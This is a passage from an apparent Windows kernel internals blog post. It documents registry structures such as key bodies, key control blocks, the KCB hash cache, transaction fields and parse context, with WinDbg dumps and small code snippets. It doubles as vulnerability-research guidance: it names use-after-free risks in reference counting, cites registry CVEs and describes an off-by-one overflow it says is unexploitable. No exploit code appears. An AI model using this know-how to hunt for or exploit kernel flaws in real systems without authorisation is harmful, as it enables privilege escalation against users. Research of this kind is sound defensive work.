lowest layer in the key stack that was access-checked when opening the key. It is later taken into account during other registry operations, in order to avoid leaking data from lower-layer, more restrictive keys that could have been created since the handle was opened.KeyControlBlock: a pointer to the corresponding key control block.NotifyBlock: an optional pointer to the notify block associated with this handle. This is related to the key notification functionality in Windows and is described in more detail in the "Key notification structures" section below.ProcessID: the PID of the process that created the handle. It doesn't seem to serve any purpose in the kernel other than to be enumerable using the NtQueryOpenSubKeysEx system call (which requires SeRestorePrivilege, and is therefore available to administrators only).KeyBodyList: the list entry used to link all the key bodies within a single KCB together.Flags: a set of flags concerning the specific key body. Here's my interpretation of them based on reverse engineering:KEY_BODY_HIVE_UNLOADED (0x1): indicates that the underlying hive of the key has been unloaded and is no longer active.KEY_BODY_DONT_RELOCK (0x2): this seems to be a short-term flag used to communicate between CmpCheckKeyBodyAccess/CmpCheckOpenAccessOnKeyBody and the nested CmpDoQueryKeyName routine, in order to indicate that the key's KCB is already locked and shouldn't be relocked again.KEY_BODY_DONT_DEINIT (0x4): if this flag is set, CmpDeleteKeyObject returns early and doesn't proceed with the regular deinitialization of the key body object. However, it is unclear if/where the flag is set in the code, as I personally haven't found any instances of it happening during my analysis.KEY_BODY_DELETED (0x8): indicates that the key has been deleted since the handle was opened, and it no longer exists.KEY_BODY_DONT_VIRTUALIZE (0x10): indicates that registry virtualization is disabled for this handle, as a result of opening the key with the (undocumented but present in SDK headers) REG_OPTION_DONT_VIRTUALIZE flag.HandleTags: from the kernel perspective, this is simply a general purpose 16-bit storage that can be set by clients on a per-handle basis using NtSetInformationKey with the KeySetHandleTagsInformation information class, and queried with NtQueryKey and the KeyHandleTagsInformation information class. As far as I know, the kernel doesn't dictate how this field should be used and leaves it up to the registry clients. In practice, it seems to be mostly used for purposes related to WOW64 and the Registry Redirector, storing flags such as KEY_WOW64_64KEY (0x100) and KEY_WOW64_32KEY (0x200), as well as some internal ones. The WOW64 functionality is implemented in KernelBase.dll, and functions such as ConstructKernelKeyPath and LocalBaseRegOpenKey are a good starting point for reverse engineering, if you're curious to learn more. I have also observed the 0x1000 handle tag being set in the internal IopApplyMutableTagToRegistryKey kernel routine for keys such as HKLM\System\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, but I'm unsure of its meaning.Trans: Indicates the transactional state of the handle. If the handle is not transacted (i.e. it wasn't opened with one of RegOpenKeyTransacted or RegCreateKeyTransacted), it is set to zero. Otherwise, the lowest bit specifies the type of the transaction: 0 for KTM and 1 for lightweight transactions. The remaining bits form a pointer to the associated transaction object, either of the TmTransactionObjectType type (represented by the _KTRANSACTION structure), or of the CmRegistryTransactionType type (represented by a non-public structure that I've personally named _CM_LIGHTWEIGHT_TRANS_OBJECT).KtmUow: if the handle is associated with a KTM transaction, this field stores the GUID that uniquely identifies it. For non-transacted and lightweight-transacted handles, the field is unused.ContextListHead: this is the head of the doubly-linked list of contexts that have been associated with the key body using the CmSetCallbackObjectContext function. It is related to the registry callbacks functionality; see also the Specifying Context Information MSDN article for more details.EnumerationResumeContext: this is part of an optimization of the subkey enumeration process of layered keys (implemented in CmpEnumerateLayeredKey). Performing full enumeration of a layered key from scratch up to the given index is a very complex task, and repeating it over and over for each iteration of an enumeration loop would be very inefficient. The resume context helps address the problem for sequential enumeration by saving the intermediate state reached at an NtEnumerateKey call with a given index, and being able to resume from it when a request for index+1 comes next. It also has the added benefit of making it possible to stop and restart the enumeration process in the scope of a single system call, which is used to pause the operation and temporarily release some locks if the code detects that the registry is particularly congested. This happens at the intersection of the CmEnumerateKey and CmpEnumerateLayeredKey functions, with the latter potentially returning STATUS_RETRY and the former resuming the operation if such a situation arises.RestrictedAccessMask, LastSearchedIndex, LockedMemoryMdls: relatively new fields introduced in Windows 10 and 11, which I haven't looked very deeply into and thus won't discuss in detail here. After a key handle is translated into the corresponding _CM_KEY_BODY structure using the ObReferenceObjectByHandle(CmKeyObjectType) call, typically early in the execution of a registry-related system call, there are three primary operations that are usually performed. First, the kernel does a key status check by evaluating the expression KeyBody.Flags & 9 to determine if the key is associated with an unloaded hive (flag 0x1) or has been deleted (flag 0x8). This check is essential because most registry operations are only permitted on active, existing keys, and enforcing this condition is a fundamental step for guaranteeing registry state consistency. Second, the code accesses the KeyControlBlock pointer, which provides further access to the hive pointer (KCB.KeyHive), the key's cell index (KCB.KeyCell), and other necessary fields and data structures required to perform any meaningful read/write actions on the key. Finally, the code checks the key body's Trans/KtmUow members to determine if the handle is part of a transaction, and if so, the transaction is used as additional context for the action requested by the caller. Accesses to other members of the _CM_KEY_BODY structure are less frequent and serve more specialized purposes.Key control block The key control block object can be thought of as the heart of the Windows kernel registry tree representation. It is effectively the descriptor of a single key in the system, and the second most important key-related object after the key node. It is always allocated from the kernel pool, and serves four main purposes: Mirrors frequently used information from the key node to make it faster to access by the kernel code. This includes building an efficient, in-memory representation of the registry tree to optimize the traversal time when referring to registry paths.Works as a single point of reference for all active handles to a specific key, and helps synchronize access to the key in the multithreaded Windows environment.Represents any pending, transacted state of the registry key that has been introduced by a client, but not fully committed yet.Represents any complex relationships between registry keys that extend beyond the internal structure of the hive. The primary example are differencing hives, which are overlaid on top of each other, and whose corresponding keys form so-called key stacks. Blog post #2 in this series highlighted the dramatic growth of the registry codebase across successive Windows versions, illustrating the subsystem's steady expansion over the last few decades. Similarly, the size of the Key Control Block (KCB) itself has nearly doubled in time, from 168 bytes in Windows XP x64 to 312 bytes in the latest Windows 11 release. This expansion underscores the increasing amount of information associated with every registry key, which the kernel must manage consistently and securely. The KCB structure layout is present in the PDB symbols and can be displayed in WinDbg: 0: kd> dt _CM_KEY_CONTROL_BLOCK nt!_CM_KEY_CONTROL_BLOCK    +0x000 RefCount         : Uint8B    +0x008 ExtFlags         : Pos 0, 16 Bits    +0x008 Freed            : Pos 16, 1 Bit    +0x008 Discarded        : Pos 17, 1 Bit    +0x008 HiveUnloaded     : Pos 18, 1 Bit    +0x008 Decommissioned   : Pos 19, 1 Bit    +0x008 SpareExtFlag     : Pos 20, 1 Bit    +0x008 TotalLevels      : Pos 21, 10 Bits    +0x010 KeyHash          : _CM_KEY_HASH    +0x010 ConvKey          : _CM_PATH_HASH    +0x018 NextHash         : Ptr64 _CM_KEY_HASH    +0x020 KeyHive          : Ptr64 _HHIVE    +0x028 KeyCell          : Uint4B    +0x030 KcbPushlock      : _EX_PUSH_LOCK    +0x038 Owner            : Ptr64 _KTHREAD    +0x038 SharedCount      : Int4B    +0x040 DelayedDeref     : Pos 0, 1 Bit    +0x040 DelayedClose     : Pos 1, 1 Bit    +0x040 Parking          : Pos 2, 1 Bit    +0x041 LayerSemantics   : UChar    +0x042 LayerHeight      : Int2B    +0x044 Spare1           : Uint4B    +0x048 ParentKcb        : Ptr64 _CM_KEY_CONTROL_BLOCK    +0x050 NameBlock        : Ptr64 _CM_NAME_CONTROL_BLOCK    +0x058 CachedSecurity   : Ptr64 _CM_KEY_SECURITY_CACHE    +0x060 ValueList        : _CHILD_LIST    +0x068 LinkTarget       : Ptr64 _CM_KEY_CONTROL_BLOCK    +0x070 IndexHint        : Ptr64 _CM_INDEX_HINT_BLOCK    +0x070 HashKey          : Uint4B    +0x070 SubKeyCount      : Uint4B    +0x078 KeyBodyListHead  : _LIST_ENTRY    +0x078 ClonedListEntry  : _LIST_ENTRY    +0x088 KeyBodyArray     : [4] Ptr64 _CM_KEY_BODY    +0x0a8 KcbLastWriteTime : _LARGE_INTEGER    +0x0b0 KcbMaxNameLen    : Uint2B    +0x0b2 KcbMaxValueNameLen : Uint2B    +0x0b4 KcbMaxValueDataLen : Uint4B    +0x0b8 KcbUserFlags     : Pos 0, 4 Bits    +0x0b8 KcbVirtControlFlags : Pos 4, 4 Bits    +0x0b8 KcbDebug         : Pos 8, 8 Bits    +0x0b8 Flags            : Pos 16, 16 Bits    +0x0bc Spare3           : Uint4B    +0x0c0 LayerInfo        : Ptr64 _CM_KCB_LAYER_INFO    +0x0c8 RealKeyName      : Ptr64 Char    +0x0d0 KCBUoWListHead   : _LIST_ENTRY    +0x0e0 DelayQueueEntry  : _LIST_ENTRY    +0x0e0 Stolen           : Ptr64 UChar    +0x0f0 TransKCBOwner    : Ptr64 _CM_TRANS    +0x0f8 KCBLock          : _CM_INTENT_LOCK    +0x108 KeyLock          : _CM_INTENT_LOCK    +0x118 TransValueCache  : _CHILD_LIST    +0x120 TransValueListOwner : Ptr64 _CM_TRANS    +0x128 FullKCBName      : Ptr64 _UNICODE_STRING    +0x128 FullKCBNameStale : Pos 0, 1 Bit    +0x128 Reserved         : Pos 1, 63 Bits    +0x130 SequenceNumber   : Uint8B I will not document each member individually, but will instead cover them in larger groups according to their common themes and functions.Reference count Key Control Blocks are among the most frequently referenced registry objects, as almost every persistent registry operation involves an associated KCB. These blocks are referenced in various ways: by a subkey's KCB.ParentKcb pointer, a symbolic link key's KCB.LinkTarget pointer, through the global KCB tree, via open key handles (and the corresponding key bodies), in pending transacted operations (e.g., the _CM_KCB_UOW.KeyControlBlock pointer), and so on. For system stability and security, it's crucial to accurately track all these active KCB references. This is done using the RefCount field, the first member in the KCB structure (offset 0x0). Historically a 16-bit field, it became a 32-bit integer, and on modern systems, it is a native word size—typically 64-bits on most computers. Whenever kernel code needs to operate on a KCB or store a pointer to it, it should increment the RefCount using functions from the CmpReferenceKeyControlBlock family. Conversely, when a KCB reference is no longer needed, functions like CmpDereferenceKeyControlBlock should decrement the count. When RefCount reaches zero, the kernel knows the structure is no longer in use and can safely free it. Besides standard reference counting, KCBs employ optimizations to delay certain memory management processes. This avoids excessive KCB allocation and deallocation when a KCB is briefly unreferenced. Two mechanisms are used: delay deref and delay close. The former delays the actual refcount decrement, while the latter postpones object deallocation even after RefCount reaches zero. Callers must use the specialized function CmpDelayDerefKeyControlBlock for the delayed dereference. From a low-level security perspective, it's worth considering potential issues related to the reference counting. Integer overflow might seem like a possibility, but it's practically impossible due to the field's width and additional overflow protection present in the CmpReferenceKeyControlBlock-like functions. A more realistic concern is a scenario where the kernel accidentally decrements the refcount by a larger value than the number of released references. This could lead to premature KCB deallocation and a use-after-free condition. Therefore, accurate KCB reference counting is a crucial area to investigate when researching Windows for registry vulnerabilities.Basic key information As mentioned earlier, one of the most important types of information in the KCB is the unique identifier of the key in the hive, consisting of the _HHIVE descriptor pointer (KeyHive) and the corresponding key cell index (KeyCell). Very frequently, the kernel uses these two members to obtain the address of the key node mapping, which resembles the following pattern in the decompiled code: _HHIVE *Hive = Kcb->KeyHive; _CM_KEY_NODE *KeyNode = Hive->GetCellRoutine(Hive, Kcb->KeyCell); // // Further operations on KeyNode... //Cached data from the key node Whenever some information about a key needs to be queried based on its handle, it is generally more efficient to read it from the KCB than the key node. The reason is that a pool-based KCB access requires fewer memory fetches (it avoids the cell map walk), bypasses the context switch to the Registry process, and eliminates the potential need to page in hive data from disk. Consequently, the following types of information are cached inside KCBs: Key name, which is stored in a public _CM_NAME_CONTROL_BLOCK structure and pointed to by the NameBlock member. Every unique key name in the system has its own instance of the _CM_NAME_CONTROL_BLOCK object, which is reference-counted and shared across all KCBs of keys with that name. This is an optimization designed to prevent storing multiple redundant copies of the same string in kernel memory.Flags, stored in the Flags member and being an exact copy of the _CM_KEY_NODE.Flags value. There is also the KcbUserFlags field that caches the value of _CM_KEY_NODE.UserFlags, and KcbVirtControlFlags, which caches the value of _CM_KEY_NODE.VirtControlFlags. The semantics of all of these bitmasks were discussed in Part 5.Security descriptor, stored in a separate _CM_KEY_SECURITY_CACHE structure and pointed to by CachedSecurity.Subkey count, stored in the SubKeyCount field. It expresses the cumulative number of the key's stable and volatile subkeys, i.e. it is equal to the sum of _CM_KEY_NODE.SubKeyCounts[0] and SubKeyCounts[1].Value list, stored in the ValueList structure of type _CHILD_LIST, and equivalent to _CM_KEY_NODE.ValueList.Key limits, represented by KcbMaxNameLen, KcbMaxValueNameLen and KcbMaxValueDataLen. They correspond to the key node fields with the same names without the "Kcb" prefix.Fully qualified path, stored in FullKCBName. It is lazily initialized in the internal CmpConstructAndCacheName function, either when resolving a symbolic link, or as a result of calling the documented CmCallbackGetKeyObjectID API. A previously initialized path may be marked as stale by setting FullKCBNameStale (the least significant bit of the FullKCBName pointer). It is essential for system security that the information found in KCBs is always synchronized with their key node counterparts. This is one of the most fundamental assumptions of the Windows registry implementation, and failure to guarantee it typically results in memory corruption or other severe security vulnerabilities.Extended flags In addition to the flags fields that simply mirror the corresponding values from the key node, like Flags, KcbUserFlags and KcbVirtControlFlags, there is also a set of extended flags that are KCB-specific. They are stored in the following fields:    +0x008 ExtFlags         : Pos 0, 16 Bits    +0x008 Freed            : Pos 16, 1 Bit    +0x008 Discarded        : Pos 17, 1 Bit    +0x008 HiveUnloaded     : Pos 18, 1 Bit    +0x008 Decommissioned   : Pos 19, 1 Bit    +0x008 SpareExtFlag     : Pos 20, 1 Bit [...]    +0x040 DelayedDeref     : Pos 0, 1 Bit    +0x040 DelayedClose     : Pos 1, 1 Bit    +0x040 Parking          : Pos 2, 1 Bit For the eight explicitly defined flags, here's a brief explanation: Freed: the KCB has been freed, but the underlying pool allocation may still be alive as part of the CmpFreeKCBListHead (older systems) or CmpKcbLookaside (Windows 10 and 11) lookaside lists.Discarded: the KCB has been unlinked from the global KCB tree and is not available for name-based lookups, but there may still be active references to it via open handles. It is typically set for keys that have been deleted, and for old instances of keys that have been renamed.HiveUnloaded: the underlying hive has been unloaded.Decommissioned: the KCB is no longer used (its reference count dropped to zero) and it is ready to be freed, but it hasn't been freed just yet.SpareExtFlag: as the name suggests, this is a spare bit that may be associated with a new flag in the future.DelayedDeref: the key is subject to a "delayed deref" mechanism, due to having been dereferenced using CmpDelayDerefKeyControlBlock instead of CmpDereferenceKeyControlBlock. This serves to defer the actual dereferencing of the KCB by some time, anticipating its near-future need and thus avoiding a redundant free-allocate sequence.DelayedClose: the key is subject to a "delayed close" mechanism, which is similar to delayed deref, but it involves delaying the freeing of a KCB structure even if its refcount has dropped to zero.Parking: the purpose of this bit is unclear, and it seems to be currently unused. Last but not least, the ExtFlags member stores a further set of flags, which can be expressed as the following enum: enum _CM_KCB_EXT_FLAGS {   CM_KCB_NO_SUBKEY           = 0x1,   CM_KCB_SUBKEY_ONE          = 0x2,   CM_KCB_SUBKEY_HINT         = 0x4,   CM_KCB_SYM_LINK_FOUND      = 0x8,   CM_KCB_KEY_NON_EXIST       = 0x10,   CM_KCB_NO_DELAY_CLOSE      = 0x20,   CM_KCB_INVALID_CACHED_INFO = 0x40,   CM_KCB_READ_ONLY_KEY       = 0x80,   CM_KCB_READ_ONLY_SUBKEY    = 0x100, }; Let's break it down: CM_KCB_NO_SUBKEY, CM_KCB_SUBKEY_ONE, CM_KCB_SUBKEY_HINT: these flags are currently obsolete, and were originally related to an old performance optimization. CM_KCB_NO_SUBKEY indicated that the key had no subkeys. CM_KCB_SUBKEY_ONE indicated that the key had exactly one subkey, and its 32-bit hint value was stored in KCB.HashKey. Finally, CM_KCB_SUBKEY_HINT indicated that the hints of all subkeys were stored in a dynamically allocated buffer pointed to by KCB.IndexHint. According to my analysis, none of the flags seem to be used in modern versions of Windows, even though their related fields in the KCB structure still exist.CM_KCB_SYM_LINK_FOUND: indicates that the key is a symbolic link whose target KCB has already been resolved during a previous access, and is cached in KCB.CachedChildList.RealKcb (older systems) or KCB.LinkTarget (Windows 10 and 11). It is an optimization designed to speed up the process of traversing symlinks, by performing the path lookup only once and later referring directly to the cached KCB where possible.CM_KCB_KEY_NON_EXIST: this is another deprecated flag that existed in historical implementations of the registry, but doesn't seem to be used anymore.CM_KCB_NO_DELAY_CLOSE: indicates that the key mustn't be subject to the "delayed close" mechanism, and instead should be freed as soon as all references to it are dropped.CM_KCB_INVALID_CACHED_INFO: this flag simply indicates that the IndexHint/HashKey/SubKeyCount fields contain out-of-date information that shouldn't be relied on.CM_KCB_READ_ONLY_KEY: this key is designated as read-only and, therefore, is not modifiable. The flag can be set by using the undocumented NtLockRegistryKey system call, which can only be called from kernel-mode. Shout out to James Forshaw who wrote an interesting post about it on his blog.CM_KCB_READ_ONLY_SUBKEY: the exact meaning and usage of the flag is unclear, but it appears to be enabled for keys with at least one descendant subkey marked as read-only. Specifically, the internal CmLockKeyForWrite function (the main routine behind NtLockRegistryKey's logic) sets it iteratively for every parent key of the read-only key, up to and including the hive's root.Key body list To optimize access, the KCB stores the first four key body handles in the KeyBodyArray for fast, lockless access. The KeyBodyListHead field maintains the head of a doubly-linked list for any additional handles.KCB lock The KcbPushlock member within the KCB structure is a lock used to synchronize access to the key during various registry system calls. This lock is passed to standard kernel pushlock APIs, such as ExAcquirePushLockSharedEx, ExAcquirePushLockExclusiveEx, and ExReleasePushLockExTransacted state The key control block is central to managing the transacted state of registry keys, maintaining pending changes in memory before they are committed to the hive. Several fields within the KCB are specifically dedicated to this function:KCBUoWListHead: This field is a list head that anchors a list of Unit of Work (UoW) structures. Each UoW represents a specific action taken within a transaction, such as creating, deleting a key or setting or deleting a value. This list allows the system to track all pending transactional operations related to a particular key, and it is crucial for ensuring atomicity, as it records the operations that must be applied or rolled back as a single unit.TransKCBOwner: This field is used to identify the transaction object that "owns" the key. It is set on the KCBs of transactionally created keys, and signifies that the key is currently only visible in the context of the specific transaction. Once the transaction commits, this field is cleared, and the key becomes visible in the global registry tree.KCBLock and KeyLock: Two so-called intent locks of type _CM_INTENT_LOCK, which are used to ensure that no two transactions can be associated with a single key if their respective operations could invalidate each other's state. According to my understanding, KCBLock protects the consistency of the KCB in this regard, and KeyLock protects the key node. The !reg ixlock WinDbg command is designed to display the internal state of these locks.TransValueCache: This field is a structure that caches value entries associated with a particular KCB, if at least one of its values has been modified in an active transaction. Before a value is set, modified or deleted within a transaction for the first time, a copy of the current value list is taken and stored here. When a transaction is committed, the TransValueCache state is applied back to the key's persistent value list. On rollback, the list is simply discarded.TransValueListOwner: This field is a pointer to a transaction that currently "owns" the TransValueCache. At any given time, for each key, there may be at most one active transaction that has any pending operations involving the key's values. These fields collectively form the core transaction management within the Windows Registry. Ever since their introduction in Windows Vista, they need to be correctly handled as part of every registry action, be it a read/write one, a transacted/non-transacted one etc. This is because the kernel must potentially incorporate any transacted state in any information queries, and must similarly pay attention not to allow the existence of two contradictory transactions at the same time, and not to allow a non-transacted operation to break any assumptions of an active transaction without invalidating it first. And any bugs related to managing the transacted state may have significant security implications, with some interesting examples being CVE-2023-21748 and CVE-2023-23420. The specific structures used to store the transacted state, such as _CM_TRANS or _CM_KCB_UOW, are discussed in more detail in the "Transaction structures" section below.Layered key state Layered keys were introduced in Windows 10 version 1607 to support containerisation through differencing hives. Because overlaying hives on top of each other is primarily a runtime concept, the Key Control Block (KCB) is the natural place to hold the state related to this feature, and there are three main members involved in this process: LayerSemantics: This 2-bit field indicates the state of a key within the layering system. It is an exact copy of the key's _CM_KEY_NODE.LayerSemantics value, cached in KCB for easier/quicker access. For a detailed overview of its possible values, please refer to Part 5.LayerHeight: This field specifies the level of the key within the differencing hive stack. A higher LayerHeight indicates that the key is higher up in the stack of layered hives, and a value of zero is used for base hives (i.e. normal non-differencing hives loaded on the host system).LayerInfo: This is a pointer to a _CM_KCB_LAYER_INFO structure, which describes the key's position within the stack of differencing hives. Among other things, it contains a pointer to the lower layer on the key stack, and the head of a list of layers above the current one. The specifics of the structures associated with this functionality are discussed in the "Layered keys" section below.KCB tree structure While key bodies are a common way to access KCB structures, they're not the only method. They are integral when you have an open handle to a key, as operations on the handle follow the handle → key body → KCB translation path. However, looking up keys by name or path is also crucial. Whether a key is opened or created, it relies on either an existing handle and a relative path (single subkey name or a longer path with backslash-separated names), or an absolute path starting with "\Registry\". In this scenario, the kernel needs to quickly check if a KCB exists for the given key and to obtain its address if it does. To achieve this, KCBs are organized into their own tree structure, which the kernel can traverse. The tree is rooted in CmpRegistryRootObject (specifically CmpRegistryRootObject->KeyControlBlock, as CmpRegistryRootObject itself is the key body representing the \Registry key), and mirrors the current registry layout from a high-level perspective. Let's highlight several key points:KCB Existence: There's no guarantee that a corresponding KCB exists for every registry key. KCBs are allocated lazily only when a key is opened, created, or when a KCB that depends on the one being created is about to be allocated.Consistent KCB Tree Structure: The KCB tree structure is always consistent. If a KCB exists for a key, then KCBs for all its ancestors up to the root \Registry key must also exist.Cached Information in KCBs: KCBs contain cached information from the key node, plus additional runtime information that may not yet be in the hive (e.g., pending transactions). Before performing any operation on a key, it's crucial to consult its KCB.KCB Uniqueness: At any given time, there can be only one KCB corresponding to a specific key attached to the tree. It's possible for multiple KCBs of the same key to exist in memory, but only if some of them correspond to deleted instances, in which case they are no longer visible in the global tree (only through the handles, until they are closed). Before creating a new KCB, the kernel should always ensure that there isn't an existing one, and if there is, use it. Failing to maintain this invariant can lead to severe consequences, as illustrated by CVE-2023-23420.KCB Tree and Hives: The KCB tree combines key descriptors from different hives and therefore must implement support for "exit nodes" and "entry nodes", as described in the previous blog post. Both exit and entry nodes have corresponding KCBs that can be viewed and analyzed in WinDbg. Resolving transitions between exit and entry nodes generally involves reading the (_HHIVE*, root cell index) pair from the exit node and then locating and navigating to the corresponding KCB in the destination hive. To speed up this process, the kernel uses an optimization that sets the CM_KCB_SYM_LINK_FOUND flag (0x8) in the exit node's KCB and stores the entry node's KCB address in KCB.LinkTarget, simulating a resolved symbolic link and avoiding the need to look up the entry's KCB every time the key is traversed. In the diagram above, entry keys are marked in blue, exit nodes in orange, and the special connection between them by the connector with black squares.Key Depth: Every open key in the system has a depth in the global tree, representing the number of nesting levels separating it from the root. This value is stored in the TotalLevels field. For example, the root key \Registry has a depth of 1, and the key \Registry\Machine\Software\Microsoft\Windows has a depth of 5.Parent KCB Pointer: Every initialized KCB structure (whether attached to the tree or not) contains a pointer to its parent KCB in the ParentKcb field. The only exception is the global root \Registry, for which this pointer is NULL. Now that we understand how the KCB tree works conceptually, let's examine how it is represented in memory. Interestingly, the KCB structure itself doesn't store a list of its subkeys. Instead, it relies on a simple 32-bit hash of the text string for fast lookups by name. The hash is calculated by multiplying successive characters of the string by powers of 37, where the first character is multiplied by the highest power and the last by the lowest (370, which is 1). This allows for a straightforward iterative implementation, shown below in C code: uint32_t HashString(const std::string& str) {   uint32_t hash = 0;   for (size_t i = 0; i < str.size(); i++) {     hash = hash * 37 + toupper(str[i]);   }   return hash; } Some example outputs of the algorithm are: HashString("Microsoft")      = 0x7f00cd26 HashString("Windows")        = 0x2f7de68b HashString("CurrentVersion") = 0x7e25f69d To calculate the hash of a path with multiple components, the same algorithm steps are repeated. However, in this case, the hashes of the successive path parts are treated similarly to the letters in the previous example. Therefore, the following formula is used to calculate the hash of the full "Microsoft\Windows\CurrentVersion" path: 0x7f00cd26 × 372 + 0x2f7de68b × 371 + 0x7e25f69d × 370 = 0x86a158ea The hash value calculated for each key, based on its path relative to the hive's root, is stored in KCB.ConvKey.Hash. Consequently, the hash value for the standard system key HKLM\Software\Microsoft\Windows\CurrentVersion is 0x86a158ea. Every hive has a directory of the KCBs within it, structured as a hashmap with a fixed number of buckets. Each bucket comprises a linked list of the KCBs located there. Internally, this directory is referred to as the "KCB cache" and is represented by the following two fields in the _CMHIVE structure:    +0x670 KcbCacheTable    : Ptr64 _CM_KEY_HASH_TABLE_ENTRY    +0x678 KcbCacheTableSize : Uint4B KcbCacheTable is a pointer to a dynamically allocated array of _CM_KEY_HASH_TABLE_ENTRY structures, and KcbCacheTableSize specifies the number of buckets (i.e., the number of elements in the KcbCacheTable array). In practice, the size of this KCB cache is 128 buckets for the virtual \Registry hive, 512 for the vast majority of hives loaded in the system, and 1024 for two specific system hives: HKLM\Software and HKLM\System. Given a specific key with a name hash denoted as ConvKey, its KCB can be found in the cache bucket indexed as follows: TmpHash = 101027 * (ConvKey ^ (ConvKey >> 9)); CacheIndex = (TmpHash ^ (TmpHash >> 9)) & (Hive->KcbCacheTableSize - 1); // // Kcb can be found in Hive->KcbCacheTable[CacheIndex] // The operation of translating a key's path hash to its KCB cache table index (excluding the modulo KcbCacheTableSize step) is called "finalization". There's even a WinDbg helper command that can perform this action for us: !reg finalize. We can test it on the hash we calculated for the "Microsoft\Windows\CurrentVersion" path: 0: kd> !reg finalize 0x86a158ea Finalized Hash for Hash=0x86a158ea: 0xc2c65312 So, the finalized hash is 0xc2c65312, and since the KCB cache hive size of the SOFTWARE hive is 1024, this means that the index of the HKLM\Software\Microsoft\Windows\CurrentVersion key in the array will be the lowest 10 bits, or 0x312. We can verify that our calculations are correct by finding the SOFTWARE hive in memory and listing the keys located in its individual buckets: 0: kd> !reg hivelistah ... | ffffe10d2dad4000 |    4da2000  | ffffe10d2da78000 |     3a6000    |  ffffe10d3489f000  | ffffe10d2d8ff000  | emRoot\System32\Config\SOFTWARE ... 0: kd> !reg openkeys ffffe10d2dad4000 ... Index 312:          86a158ea kcb=ffffe10d2d576a30 cell=000a58e8 f=00200000 \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION ... As we can see, our calculations have been proven to be accurate. We could achieve a similar result with the !reg hashindex command, which takes the address of the _HHIVE object and the ConvKey for a given key, and then prints out information about the corresponding bucket. Within a single bucket in the KCB cache, all the KCBs are linked together in a singly-linked list starting at the _CM_KEY_HASH_TABLE_ENTRY.Entry pointer. The subsequent elements are accessible through the _CM_KEY_HASH.NextHash field, which points to the KCB.KeyHash structure in the next KCB on the list. A diagram of this data structure is shown below: Now that we understand how the KCB objects are internally organized, let's examine how name lookups are implemented. Suppose we want to take a single step through a path and find the KCB of the next subkey based on its parent KCB and the key name. The process is as follows (assuming the parent is not an exit node):Get the pointer to the hive descriptor on which we are currently operating from ParentKcb->KeyHive.Calculate the hash of the subkey name based on its full path relative to the hive in which it is located.Calculate the appropriate index in the KCB cache based on the name hash and iterate through the linked list, comparing:The hash of the key name.The pointer to the parent KCB.If both of the above match, perform a full comparison of the key name. If it matches, we have found the subkey. The process is particularly interesting because it is not based on directly iterating through the subkeys of a given key, but instead on iterating through all the keys in the particular cache bucket. Thanks to the use of hashing, the vast majority of checks of potential candidates for the sought-after subkey are reduced to a single comparison of two 32-bit numbers, making the whole process quite efficient. The performance is mostly dependent on the total number of keys in the hive and the number of hash collisions for the specific cache index. If you'd like to dive deeper into the implementation of KCB tree traversal, I recommend analyzing the internal function CmpFindKcbInHashEntryByName, which performs a single step through the tree as described above. Another useful function to analyze is CmpPerformCompleteKcbCacheLookup, which recursively searches the tree to find the deepest KCB object corresponding to one of the elements of a given path. For those experimenting in WinDbg, here are a few useful commands related to KCBs and their trees:!reg findkcb: This command finds the address of the KCB in the global tree that corresponds to the given fully qualified registry path, if it exists.!reg querykey: Similar to the command above, but in addition to providing the KCB address, it also prints the hive descriptor address, the corresponding key node address, and information about subkeys and values of the given key.!reg kcb: This command prints basic information about a key based on its KCB. Its advantage is that it translates flag names into their textual equivalents (e.g., CompressedName, NoDelete, HiveEntry, etc.), but it often doesn't provide the specific information one is looking for. In that case, it might be necessary to use the dt _CM_KEY_CONTROL_BLOCK command to dump the entire structure.Other structures So far, this blog post has described only a few of the most important registry structures, which are essential to know for anyone conducting research in this area. However, in total, there are over 150 different structures used in the Windows kernel and related to the registry, and only about half are documented through debug symbols or on Microsoft's website. While it's impossible to detail the operation and function of all of these structures in one article, this section aims to at least provide an overview of a majority of them, to note which of them are publicly available, and to briefly describe how they are used internally. The layout of many structures corresponding to the most complex mechanisms is publicly unknown at the time of writing and requires significant time and energy to reconstruct. Even then, the correct meaning of each field and flag cannot be guaranteed. Therefore, the information below should be used with caution and verified against the specific Windows version(s) in question before relying on it in any way.Key opening/creation In PDB Structure name Description ❌ Parse context Given that the registry is integrated with the standard Windows object model, all operations on registry paths (both absolute and relative) must be performed through the standard NT Object Manager interface. For example, the NtCreateKey syscall calls the CmCreateKey helper function. At this point, there are no further calls to Configuration Manager, but instead, there is a call to ObOpenObjectByNameEx (a more advanced version of ObOpenObjectByName). Several levels down, the kernel will transfer execution back to the registry code, specifically to the CmpParseKey callback, which is the entry point responsible for handling all path operations (i.e., all key open/create actions). This means that the CmCreateKey and CmpParseKey functions, which work together, cannot pass an arbitrary number of input and output arguments to each other. They only have one pointer (ParseContext) at their disposal, which can serve as a communication channel. Thus, the agreement between these functions is that the pointer points to a special "parse context" structure, which has three main roles:Pass the input configuration of a given operation, e.g. information about:operation mode (open/create),transactionality of the operation,following of symbolic links,flags related to WOW64 functionality,optional class data of the created key.Pass some return information, such as whether the key was opened or created,Cache certain information within a single "parse" request, e.g.:information on whether registry virtualization is enabled for a given process,when following a symbolic link, a pointer to the originating hive descriptor, in order to check whether the given transition is allowed within the hive trust class,when following a symbolic link, a pointer to the KCB of its target (or the closest possible ancestor). Reconstructing the layout of this structure is a critical step in getting a better understanding of how the key opening/creation process works internally. ❌ Path info When a client references a key by name, one of the first actions taken by the CmpParseKey function (or more specifically, CmpDoParseKey) is to take the string representing that name (absolute or relative), break it into individual parts separated by backslashes, and calculate the 32-bit hashes for each of them. This ensures that parsing only occurs once and doesn't need to be repeated. The structure where the result of this operation is stored is called "path info". According to the documentation, a single registry path reference can contain a maximum of 32 levels of nesting. Therefore, the path info structure allows for the storage of 32 elements, in the following way: the first 8 elements being present directly within the structure, and if the path is deeply nested, an additional 24 elements within a supplementary structure allocated on-demand from kernel pools. The functions that operate on this object are CmpComputeComponentHashes, CmpExpandPathInfo, CmpValidateComponents, CmpGetComponentNameAtIndex, CmpGetComponentHashAtIndex, and CmpCleanupPathInfo. Interestingly, I discovered an off-by-one bug in the CmpComputeComponentHashes function, which allows an attacker to write 25 values into a 24-element array. However, due to a fortunate coincidence, path info structures are allocated from a special lookaside list with allocation sizes significantly larger than the length of the structure itself. As a result, this buffer overflow is not exploitable in practice, which has also been confirmed by Microsoft. More information about this issue, as well as the reversed definition of this structure, can be found in my original report.Key notifications In 